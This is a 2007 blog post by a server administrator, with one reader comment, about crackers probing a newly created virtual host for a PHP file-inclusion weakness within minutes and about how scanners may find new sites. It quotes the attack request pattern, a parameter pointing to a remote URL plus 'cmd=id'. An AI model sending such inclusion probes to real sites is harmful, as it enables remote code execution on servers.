An interesting observation about web cracker behavior

April 7, 2007

I recently got around to setting up a web site for a top level .org domain that has existed for more than a decade but previously never had a website or even had a 'www.<domain>.org' host defined in its DNS records. I did this with a name-based virtual host on a machine that had not previously been running a web server on port 80.

Within minutes, crackers were poking that virtual host in an attempt to exploit a PHP vulnerability; by contrast, it took three days before the first cracker showed up to poke the web server itself.

(Specifically, the crackers were requesting the URL 'index.php?id=<where>?&cmd=id', where the <where> bit was an URL; the URLs varied. Judging from the content of the URLs, this is some sort of PHP file inclusion attack, which was being exploited for various things.)

I wouldn't have been surprised by crackers poking my new web server by its IP address; in the good old days, I saw Nimda/Code Red exploit attempts against a new web server within minutes of bringing it up. What surprises me is that the crackers were specifically poking my virtual host instead of the web server itself.

(Equally interesting is that my old friend MSNBot showed up to visit the virtual host, but not the real web server, within twelve hours.)

My only guess is that both the crackers (well, their software) and MSNBot keep lists of top level domains and periodically poke them to see if they've grown a web site. It's possible that the widespread growth of virtual hosting has either forced this approach, or simply made it a better avenue than scanning IP addresses looking for new web servers.

(To some extent it probably depends on what sort of vulnerability you want to exploit. If you want to exploit a problem with the web server itself, you can just scan IPs since it doesn't matter what site on the web server you hit. However, if you want to exploit a common error in site setup, scanning virtual hosts/domain names may well be better.)


Comments on this page:

From 206.168.172.26 at 2007-04-07 01:09:28:

For an attacker, it makes great sense to hit newly minted sites quickly. Given the typical way sites are set up, with the site available before the server and default PHP installs are hardened, there's a window of opportunity there they don't want to miss.

Written on 07 April 2007.
« Why network booting is not a good answer
Weekly spam summary on April 7th, 2007 »

Page tools: View Source, View Normal, Add Comment.
Search:
Login: Password:
Atom Syndication: Recent Comments.

Last modified: Sat Apr 7 00:13:27 2007
This dinky wiki is brought to you by the Insane Hackers Guild, Python sub-branch.